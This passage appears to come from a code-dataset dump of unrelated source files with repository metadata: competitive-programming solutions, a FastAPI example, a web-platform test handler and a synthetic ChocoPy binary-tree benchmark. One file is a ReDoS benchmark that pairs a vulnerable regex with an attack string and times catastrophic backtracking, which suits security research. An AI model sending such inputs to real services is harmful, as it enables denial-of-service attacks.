axes[1].set_title('Perceived')
axes[1].axis('off')
axes[2].imshow(fixate_belief)
axes[2].set_title('Fixation (w/o saccade)')
axes[2].axis('off')
axes[2].scatter(*(fixate_saccades.T + w_span), color='white')
plt.savefig('test.png', dpi=300)
| [
"joelye9@gmail.com"
] | joelye9@gmail.com |
6021df1a5e4afffdf7611d6391b4abe981929627 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2845/60765/274571.py | e890da8bf65c177ac99bcb7981532e0c0a99bf23 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 437 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Reads n, a list of prices and a list of qualities, and reports whether some
# laptop is strictly cheaper yet strictly better than another (appears to be
# the Codeforces "Alex and laptops" problem; prices are pairwise distinct).
input()  # the declared count is unused; the list lengths determine n
a = list(map(int, input().split()))  # prices
b = list(map(int, input().split()))  # qualities
pairs = sorted(zip(a, b), key=lambda p: p[0])  # stable sort by price only
# After sorting by price, any adjacent drop in quality means a cheaper laptop
# beats a pricier one.
if any(pairs[i][1] > pairs[i + 1][1] for i in range(len(pairs) - 1)):
    print('Happy Alex')
else:
    # Bug fix: the original loop printed nothing at all when n == 1;
    # now every input produces an answer.
    print('Poor Alex')
| [
"1069583789@qq.com"
] | 1069583789@qq.com |
c6406ced2221fb7e2c50769c42574bc91280dd5a | 0adb68bbf576340c8ba1d9d3c07320ab3bfdb95e | /regexlib/2021-5-15/python_re_test_file/regexlib_7745.py | ffca8351109d1a4bdc6278e4c8266b6f3ecf2f39 | [
"MIT"
] | permissive | agentjacker/ReDoS-Benchmarks | c7d6633a3b77d9e29e0ee2db98d5dfb60cde91c6 | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | refs/heads/main | 2023-05-10T13:57:48.491045 | 2021-05-21T11:19:39 | 2021-05-21T11:19:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 475 | py | # 7745
# ^\w*[-]*\w*\\\w*$
# POLYNOMIAL
# nums:4
# POLYNOMIAL AttackString:""+"0"*10000+"! _1_POA(i)"
# ReDoS benchmark driver: times the pattern (labelled POLYNOMIAL above) on
# ever-longer attack strings.  Intentionally slow — do not "optimize" the
# loop; measuring the blow-up is the point.
import re
from time import perf_counter
regex = """^\w*[-]*\w*\\\w*$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    # i * 10000 zeros followed by a suffix that forces a failed match
    ATTACK = "" + "0" * i * 10000 + "! _1_POA(i)"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *10000}: took {DURATION} seconds!")
"liyt@ios.ac.cn"
] | liyt@ios.ac.cn |
9cd31045bab54a275a87b2929087052987ccfdcd | 04b1803adb6653ecb7cb827c4f4aa616afacf629 | /third_party/blink/web_tests/external/wpt/xhr/resources/inspect-headers.py | e71f671ced34ff3d447467ea4098e6e000ffd8f7 | [
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | permissive | Samsung/Castanets | 240d9338e097b75b3f669604315b06f7cf129d64 | 4896f732fc747dfdcfcbac3d442f2d2d42df264a | refs/heads/castanets_76_dev | 2023-08-31T09:01:04.744346 | 2021-07-30T04:56:25 | 2021-08-11T05:45:21 | 125,484,161 | 58 | 49 | BSD-3-Clause | 2022-10-16T19:31:26 | 2018-03-16T08:07:37 | null | UTF-8 | Python | false | false | 1,356 | py | def get_response(raw_headers, filter_value, filter_name):
result = ""
for line in raw_headers.headers:
if line[-2:] != '\r\n':
return "Syntax error: missing CRLF: " + line
line = line[:-2]
if ': ' not in line:
return "Syntax error: no colon and space found: " + line
name, value = line.split(': ', 1)
if filter_value:
if value == filter_value:
result += name + ","
elif name.lower() == filter_name:
result += name + ": " + value + "\n"
return result
def main(request, response):
headers = []
if "cors" in request.GET:
headers.append(("Access-Control-Allow-Origin", "*"))
headers.append(("Access-Control-Allow-Credentials", "true"))
headers.append(("Access-Control-Allow-Methods", "GET, POST, PUT, FOO"))
headers.append(("Access-Control-Allow-Headers", "x-test, x-foo"))
headers.append(("Access-Control-Expose-Headers", "x-request-method, x-request-content-type, x-request-query, x-request-content-length"))
headers.append(("content-type", "text/plain"))
filter_value = request.GET.first("filter_value", "")
filter_name = request.GET.first("filter_name", "").lower()
result = get_response(request.raw_headers, filter_value, filter_name)
return headers, result
| [
"sunny.nam@samsung.com"
] | sunny.nam@samsung.com |
69e8b76324acdc71454c9bed7115bb9276cc104c | 09f205f74070c53e694d52f0bc72e203a2fd224f | /docs_src/query_params/tutorial006.py | d764c2a863e0809462be935bbc57ab24d2df9b29 | [
"MIT"
] | permissive | RunningIkkyu/fastapi | 53c02fed44b9e30e8617c94ec902be7ca579e42b | 05736c40d3fbb008fd9cdbe1adb8fcef7676e0c6 | refs/heads/master | 2021-05-18T07:58:33.640797 | 2020-05-21T01:36:47 | 2020-05-21T01:36:47 | 251,189,158 | 2 | 0 | MIT | 2020-05-21T01:36:49 | 2020-03-30T03:13:43 | Python | UTF-8 | Python | false | false | 256 | py | from fastapi import FastAPI
app = FastAPI()
@app.get("/items/{item_id}")
async def read_user_item(item_id: str, needy: str, skip: int = 0, limit: int = None):
item = {"item_id": item_id, "needy": needy, "skip": skip, "limit": limit}
return item
| [
"tiangolo@gmail.com"
] | tiangolo@gmail.com |
0556fc6274db7bf87fb08c6b7c4833091be52242 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/tree-big-7522.py | 0de294240c35bc14c520c5cb061c04af8134d8d0 | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,291 | py | # Binary-search trees
class TreeNode(object):
    """A binary-search-tree node; leaves are created via the external makeNode."""
    value:int = 0
    left:"TreeNode" = None
    right:"TreeNode" = None
    def insert(self:"TreeNode", x:int) -> bool:
        # Duplicates are rejected; otherwise descend into the matching side
        # and attach a new leaf where the child is missing.
        if x == self.value:
            return False
        if x < self.value:
            if self.left is not None:
                return self.left.insert(x)
            self.left = makeNode(x)
            return True
        if self.right is not None:
            return self.right.insert(x)
        self.right = makeNode(x)
        return True
    def contains(self:"TreeNode", x:int) -> bool:
        # Walk down the matching subtree; a missing child means x is absent.
        if x == self.value:
            return True
        child = self.left if x < self.value else self.right
        return child is not None and child.contains(x)
# Generated benchmark class: a BST whose fields are duplicated ("value2",
# "left2", ...).  Only `value`, `left` and `right` participate in the tree
# logic; the numbered method variants duplicate the single-key bodies and
# ignore their extra arguments (this mirrors the generator's output — do not
# "fix" it without updating the benchmark expectations).
class TreeNode2(object):
    value:int = 0
    value2:int = 0
    left:"TreeNode2" = None
    left2:"TreeNode2" = None
    right:"TreeNode2" = None
    right2:"TreeNode2" = None
    # Standard BST insert; returns False for duplicates.  New leaves come
    # from the external factory makeNode2 (not shown in this chunk).
    def insert(self:"TreeNode2", x:int) -> bool:
        if x < self.value:
            if self.left is None:
                self.left = makeNode2(x, x)
                return True
            else:
                return self.left.insert(x)
        elif x > self.value:
            if self.right is None:
                self.right = makeNode2(x, x)
                return True
            else:
                return self.right.insert(x)
        return False
    # NOTE: x2 is ignored — the body duplicates insert(x) and recurses into
    # insert, not insert2.
    def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
        if x < self.value:
            if self.left is None:
                self.left = makeNode2(x, x)
                return True
            else:
                return self.left.insert(x)
        elif x > self.value:
            if self.right is None:
                self.right = makeNode2(x, x)
                return True
            else:
                return self.right.insert(x)
        return False
    # Standard BST membership test.
    def contains(self:"TreeNode2", x:int) -> bool:
        if x < self.value:
            if self.left is None:
                return False
            else:
                return self.left.contains(x)
        elif x > self.value:
            if self.right is None:
                return False
            else:
                return self.right.contains(x)
        else:
            return True
    # NOTE: x2 is ignored — the body duplicates contains(x) and recurses into
    # contains, not contains2.
    def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
        if x < self.value:
            if self.left is None:
                return False
            else:
                return self.left.contains(x)
        elif x > self.value:
            if self.right is None:
                return False
            else:
                return self.right.contains(x)
        else:
            return True
# Generated benchmark class: same BST as TreeNode, but with every field and
# method triplicated.  Only `value`, `left` and `right` drive the tree logic;
# the numbered variants duplicate the single-key bodies and ignore their
# extra arguments (matches the generator's output by design).
class TreeNode3(object):
    value:int = 0
    value2:int = 0
    value3:int = 0
    left:"TreeNode3" = None
    left2:"TreeNode3" = None
    left3:"TreeNode3" = None
    right:"TreeNode3" = None
    right2:"TreeNode3" = None
    right3:"TreeNode3" = None
    # Standard BST insert; returns False for duplicates.  New leaves come
    # from the external factory makeNode3 (not shown in this chunk).
    def insert(self:"TreeNode3", x:int) -> bool:
        if x < self.value:
            if self.left is None:
                self.left = makeNode3(x, x, x)
                return True
            else:
                return self.left.insert(x)
        elif x > self.value:
            if self.right is None:
                self.right = makeNode3(x, x, x)
                return True
            else:
                return self.right.insert(x)
        return False
    # NOTE: x2 is ignored — delegates to the single-key insert logic.
    def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
        if x < self.value:
            if self.left is None:
                self.left = makeNode3(x, x, x)
                return True
            else:
                return self.left.insert(x)
        elif x > self.value:
            if self.right is None:
                self.right = makeNode3(x, x, x)
                return True
            else:
                return self.right.insert(x)
        return False
    # NOTE: x2/x3 are ignored — delegates to the single-key insert logic.
    def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
        if x < self.value:
            if self.left is None:
                self.left = makeNode3(x, x, x)
                return True
            else:
                return self.left.insert(x)
        elif x > self.value:
            if self.right is None:
                self.right = makeNode3(x, x, x)
                return True
            else:
                return self.right.insert(x)
        return False
    # Standard BST membership test.
    def contains(self:"TreeNode3", x:int) -> bool:
        if x < self.value:
            if self.left is None:
                return False
            else:
                return self.left.contains(x)
        elif x > self.value:
            if self.right is None:
                return False
            else:
                return self.right.contains(x)
        else:
            return True
    # NOTE: x2 is ignored — delegates to the single-key contains logic.
    def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
        if x < self.value:
            if self.left is None:
                return False
            else:
                return self.left.contains(x)
        elif x > self.value:
            if self.right is None:
                return False
            else:
                return self.right.contains(x)
        else:
            return True
    # NOTE: x2/x3 are ignored — delegates to the single-key contains logic.
    def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
        if x < self.value:
            if self.left is None:
                return False
            else:
                return self.left.contains(x)
        elif x > self.value:
            if self.right is None:
                return False
            else:
                return self.right.contains(x)
        else:
            return True
class TreeNode4(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
left:"TreeNode4" = None
left2:"TreeNode4" = None
left3:"TreeNode4" = None
left4:"TreeNode4" = None
right:"TreeNode4" = None
right2:"TreeNode4" = None
right3:"TreeNode4" = None
right4:"TreeNode4" = None
def insert(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
    def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
        # Identical to contains(); extra parameters are ignored padding.
        if x < self.value:
            if self.left is None:
                return False
            else:
                return self.left.contains(x)
        elif x > self.value:
            if self.right is None:
                return False
            else:
                return self.right.contains(x)
        else:
            return True
    def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
        # Identical to contains(); extra parameters are ignored padding.
        if x < self.value:
            if self.left is None:
                return False
            else:
                return self.left.contains(x)
        elif x > self.value:
            if self.right is None:
                return False
            else:
                return self.right.contains(x)
        else:
            return True
class TreeNode5(object):
    # BST node; only `value`, `left`, and `right` participate in the logic.
    # The numbered attribute duplicates and the insert2..insert5 /
    # contains2..contains5 variants are generated benchmark padding.
    value:int = 0
    value2:int = 0
    value3:int = 0
    value4:int = 0
    value5:int = 0
    left:"TreeNode5" = None
    left2:"TreeNode5" = None
    left3:"TreeNode5" = None
    left4:"TreeNode5" = None
    left5:"TreeNode5" = None
    right:"TreeNode5" = None
    right2:"TreeNode5" = None
    right3:"TreeNode5" = None
    right4:"TreeNode5" = None
    right5:"TreeNode5" = None
    def insert(self:"TreeNode5", x:int) -> bool:
        # BST insert; True iff a new node was created (duplicates rejected).
        if x < self.value:
            if self.left is None:
                self.left = makeNode5(x, x, x, x, x)
                return True
            else:
                return self.left.insert(x)
        elif x > self.value:
            if self.right is None:
                self.right = makeNode5(x, x, x, x, x)
                return True
            else:
                return self.right.insert(x)
        return False
    def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
        # Identical to insert(); extra parameters are ignored padding.
        if x < self.value:
            if self.left is None:
                self.left = makeNode5(x, x, x, x, x)
                return True
            else:
                return self.left.insert(x)
        elif x > self.value:
            if self.right is None:
                self.right = makeNode5(x, x, x, x, x)
                return True
            else:
                return self.right.insert(x)
        return False
    def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
        # Identical to insert(); extra parameters are ignored padding.
        if x < self.value:
            if self.left is None:
                self.left = makeNode5(x, x, x, x, x)
                return True
            else:
                return self.left.insert(x)
        elif x > self.value:
            if self.right is None:
                self.right = makeNode5(x, x, x, x, x)
                return True
            else:
                return self.right.insert(x)
        return False
    def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
        # Identical to insert(); extra parameters are ignored padding.
        if x < self.value:
            if self.left is None:
                self.left = makeNode5(x, x, x, x, x)
                return True
            else:
                return self.left.insert(x)
        elif x > self.value:
            if self.right is None:
                self.right = makeNode5(x, x, x, x, x)
                return True
            else:
                return self.right.insert(x)
        return False
    def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
        # Identical to insert(); extra parameters are ignored padding.
        if x < self.value:
            if self.left is None:
                self.left = makeNode5(x, x, x, x, x)
                return True
            else:
                return self.left.insert(x)
        elif x > self.value:
            if self.right is None:
                self.right = makeNode5(x, x, x, x, x)
                return True
            else:
                return self.right.insert(x)
        return False
    def contains(self:"TreeNode5", x:int) -> bool:
        # BST membership test for x in this subtree.
        if x < self.value:
            if self.left is None:
                return False
            else:
                return self.left.contains(x)
        elif x > self.value:
            if self.right is None:
                return False
            else:
                return self.right.contains(x)
        else:
            return True
    def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
        # Identical to contains(); extra parameters are ignored padding.
        if x < self.value:
            if self.left is None:
                return False
            else:
                return self.left.contains(x)
        elif x > self.value:
            if self.right is None:
                return False
            else:
                return self.right.contains(x)
        else:
            return True
    def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
        # Identical to contains(); extra parameters are ignored padding.
        if x < self.value:
            if self.left is None:
                return False
            else:
                return self.left.contains(x)
        elif x > self.value:
            if self.right is None:
                return False
            else:
                return self.right.contains(x)
        else:
            return True
    def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
        # Identical to contains(); extra parameters are ignored padding.
        if x < self.value:
            if self.left is None:
                return False
            else:
                return self.left.contains(x)
        elif x > self.value:
            if self.right is None:
                return False
            else:
                return self.right.contains(x)
        else:
            return True
    def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
        # Identical to contains(); extra parameters are ignored padding.
        if x < self.value:
            if self.left is None:
                return False
            else:
                return self.left.contains(x)
        elif x > self.value:
            if self.right is None:
                return False
            else:
                return self.right.contains(x)
        else:
            return True
class Tree(object):
    # Thin wrapper around a TreeNode BST root that tracks the node count.
    root:TreeNode = None
    size:int = 0
    def insert(self:"Tree", x:int) -> object:
        # Create the root on first insert; otherwise delegate and bump the
        # size only when a new node was actually added.
        if self.root is None:
            self.root = makeNode(x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def contains(self:"Tree", x:int) -> bool:
        # Empty tree contains nothing; otherwise delegate to the root node.
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
class Tree2(object):
    # Same wrapper as Tree but over TreeNode2; only root/size are used, and
    # the *2 method/attribute variants are generated benchmark padding.
    root:TreeNode2 = None
    root2:TreeNode2 = None
    size:int = 0
    size2:int = 0
    def insert(self:"Tree2", x:int) -> object:
        if self.root is None:
            self.root = makeNode2(x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def insert2(self:"Tree2", x:int, x2:int) -> object:
        # Identical to insert(); `x2` is ignored padding.
        if self.root is None:
            self.root = makeNode2(x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def contains(self:"Tree2", x:int) -> bool:
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
    def contains2(self:"Tree2", x:int, x2:int) -> bool:
        # Identical to contains(); `x2` is ignored padding.
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
class Tree3(object):
    # Same wrapper as Tree but over TreeNode3; only root/size are used, and
    # the numbered variants are generated benchmark padding.
    root:TreeNode3 = None
    root2:TreeNode3 = None
    root3:TreeNode3 = None
    size:int = 0
    size2:int = 0
    size3:int = 0
    def insert(self:"Tree3", x:int) -> object:
        if self.root is None:
            self.root = makeNode3(x, x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def insert2(self:"Tree3", x:int, x2:int) -> object:
        # Identical to insert(); extra parameters are ignored padding.
        if self.root is None:
            self.root = makeNode3(x, x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
        # Identical to insert(); extra parameters are ignored padding.
        if self.root is None:
            self.root = makeNode3(x, x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def contains(self:"Tree3", x:int) -> bool:
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
    def contains2(self:"Tree3", x:int, x2:int) -> bool:
        # Identical to contains(); extra parameters are ignored padding.
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
    def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
        # Identical to contains(); extra parameters are ignored padding.
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
class Tree4(object):
    # Same wrapper as Tree but over TreeNode4; only root/size are used, and
    # the numbered variants are generated benchmark padding.
    root:TreeNode4 = None
    root2:TreeNode4 = None
    root3:TreeNode4 = None
    root4:TreeNode4 = None
    size:int = 0
    size2:int = 0
    size3:int = 0
    size4:int = 0
    def insert(self:"Tree4", x:int) -> object:
        if self.root is None:
            self.root = makeNode4(x, x, x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def insert2(self:"Tree4", x:int, x2:int) -> object:
        # Identical to insert(); extra parameters are ignored padding.
        if self.root is None:
            self.root = makeNode4(x, x, x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
        # Identical to insert(); extra parameters are ignored padding.
        if self.root is None:
            self.root = makeNode4(x, x, x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
        # Identical to insert(); extra parameters are ignored padding.
        if self.root is None:
            self.root = makeNode4(x, x, x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def contains(self:"Tree4", x:int) -> bool:
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
    def contains2(self:"Tree4", x:int, x2:int) -> bool:
        # Identical to contains(); extra parameters are ignored padding.
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
    def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
        # Identical to contains(); extra parameters are ignored padding.
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
    def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
        # Identical to contains(); extra parameters are ignored padding.
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
class Tree5(object):
    # Same wrapper as Tree but over TreeNode5; only root/size are used, and
    # the numbered variants are generated benchmark padding.
    root:TreeNode5 = None
    root2:TreeNode5 = None
    root3:TreeNode5 = None
    root4:TreeNode5 = None
    root5:TreeNode5 = None
    size:int = 0
    size2:int = 0
    size3:int = 0
    size4:int = 0
    size5:int = 0
    def insert(self:"Tree5", x:int) -> object:
        if self.root is None:
            self.root = makeNode5(x, x, x, x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def insert2(self:"Tree5", x:int, x2:int) -> object:
        # Identical to insert(); extra parameters are ignored padding.
        if self.root is None:
            self.root = makeNode5(x, x, x, x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
        # Identical to insert(); extra parameters are ignored padding.
        if self.root is None:
            self.root = makeNode5(x, x, x, x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
        # Identical to insert(); extra parameters are ignored padding.
        if self.root is None:
            self.root = makeNode5(x, x, x, x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
        # Identical to insert(); extra parameters are ignored padding.
        if self.root is None:
            self.root = makeNode5(x, x, x, x, x)
            self.size = 1
        else:
            if self.root.insert(x):
                self.size = self.size + 1
    def contains(self:"Tree5", x:int) -> bool:
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
    def contains2(self:"Tree5", x:int, x2:int) -> bool:
        # Identical to contains(); extra parameters are ignored padding.
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
    def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
        # Bug fix: `x2` was annotated `$Type` — an unexpanded generator /
        # mutation placeholder that is not valid syntax. Restored to `int`
        # to match the sibling contains2/contains4 signatures.
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
    def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
        # Identical to contains(); extra parameters are ignored padding.
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
    def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
        # Identical to contains(); extra parameters are ignored padding.
        if self.root is None:
            return False
        else:
            return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
    # Leaf factory for TreeNode. The up-front `b:... = None` declaration is
    # ChocoPy-style: locals are declared with a type before first use.
    b:TreeNode = None
    b = TreeNode()
    b.value = x
    return b
def makeNode2(x: int, x2: int) -> TreeNode2:
    # Leaf factory for TreeNode2; `x2` and the `b2` declaration are unused
    # generated benchmark padding.
    b:TreeNode2 = None
    b2:TreeNode2 = None
    b = TreeNode2()
    b.value = x
    return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
    # Leaf factory for TreeNode3; extra parameters/declarations are padding.
    b:TreeNode3 = None
    b2:TreeNode3 = None
    b3:TreeNode3 = None
    b = TreeNode3()
    b.value = x
    return b
def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4:
    # Leaf factory for TreeNode4; extra parameters/declarations are padding.
    b:TreeNode4 = None
    b2:TreeNode4 = None
    b3:TreeNode4 = None
    b4:TreeNode4 = None
    b = TreeNode4()
    b.value = x
    return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
    # Leaf factory for TreeNode5; extra parameters/declarations are padding.
    b:TreeNode5 = None
    b2:TreeNode5 = None
    b3:TreeNode5 = None
    b4:TreeNode5 = None
    b5:TreeNode5 = None
    b = TreeNode5()
    b.value = x
    return b
# Input parameters
# Only n (insert count), c (skip modulus), t, i, and k are actually read;
# the numbered duplicates are generated benchmark padding.
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
t = Tree()
while i < n:
    t.insert(k)
    # k walks a multiplicative sequence mod 37831 to generate varied keys.
    k = (k * 37813) % 37831
    if i % c != 0:
        # Also insert most loop indices (skipping multiples of c).
        t.insert(i)
    i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
    if t.contains(i):
        print(i)
| [
"647530+Virtlink@users.noreply.github.com"
] | 647530+Virtlink@users.noreply.github.com |
9f5f60cd24bb4ba0a3ed8fc4a7b797829f8a4512 | 181af10fcf40b824fe92d3b8f72fd15d6d1490c2 | /Biweekly Contests/51-100/biweek 98/2568. Minimum Impossible OR/Minimum Impossible OR.py | 6bbcc085906cb358f19e80cbfef2653c5595026a | [] | no_license | wangyendt/LeetCode | 402c59a0b7b7f5b3a672231ea5dad8056ade36af | 4a3ba15284c45b2d8bf38306c8c8526ae174615c | refs/heads/master | 2023-08-10T06:27:54.995152 | 2023-08-10T02:22:27 | 2023-08-10T02:22:27 | 176,651,399 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | """
@author: wangye(Wayne)
@license: Apache Licence
@file: Minimum Impossible OR.py
@time: 20230330
@contact: wang121ye@hotmail.com
@site: wangyendt@github.com
@software: PyCharm
# code is far away from bugs.
"""
from typing import *
class Solution:
    def minImpossibleOR(self, nums: List[int]) -> int:
        """Return the smallest positive integer that cannot be expressed as
        a bitwise OR of some subset of ``nums``.

        ORing elements can only set bits that already appear, so a power of
        two is achievable iff it is itself present; the answer is therefore
        the first missing power of two.
        """
        present = set(nums)
        candidate = 1
        for _ in range(1000):
            if candidate not in present:
                return candidate
            candidate <<= 1
# Ad-hoc smoke test: powers 1, 2, 4, 8, 16, 32 are all present, so the
# expected output is 64.
so = Solution()
print(so.minImpossibleOR(nums=[4, 32, 16, 8, 8, 75, 1, 2]))
| [
"905317742@qq.com"
] | 905317742@qq.com |
160bdd13a34885811fabe3e183291048859c9306 | 4296cb5b97a69382d1fe6b73753a2ffcd1d154c5 | /tenkei90/064.py | 05309a40d520930ec7dd6c78e4e01ef920de1155 | [] | no_license | tokuD/atcoder | a199a5fe92be54d0b66ceaf6158116984f52cd01 | a95a0380af129109fcf48eb1d4994bbb52925320 | refs/heads/master | 2023-08-28T10:28:55.763895 | 2021-11-13T15:49:38 | 2021-11-13T15:49:38 | 371,675,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 635 | py | def main():
    # Difference-array technique: dif[i] = A[i+1] - A[i], and the maintained
    # answer is sum(|dif[i]|). A range-add of V on [L, R] only changes the
    # two boundary differences, so each query updates in O(1).
    N,Q = map(int,input().split())
    A = list(map(int,input().split()))
    LRV = [list(map(int,input().split())) for i in range(Q)]
    dif = []
    ans = 0
    for i in range(N-1):
        dif.append(A[i+1]-A[i])
    for i in range(N-1):
        ans += abs(dif[i])
    for i in range(Q):
        # The lambda shifts L, R, V all to 0-based; V += 1 undoes the shift
        # for V, which is a value (not an index).
        L,R,V = map(lambda x: x-1,LRV[i])
        V += 1
        if L > 0:
            # Remove the old contribution of the left boundary, apply the
            # delta, then add the new contribution back.
            ans -= abs(dif[L-1])
            dif[L-1] += V
            ans += abs(dif[L-1])
        if R < N-1:
            ans -= abs(dif[R])
            dif[R] -= V
            ans += abs(dif[R])
        # One answer line per query.
        print(ans)
if __name__ == '__main__':
    main()
| [
"megumu112851@gmail.com"
] | megumu112851@gmail.com |
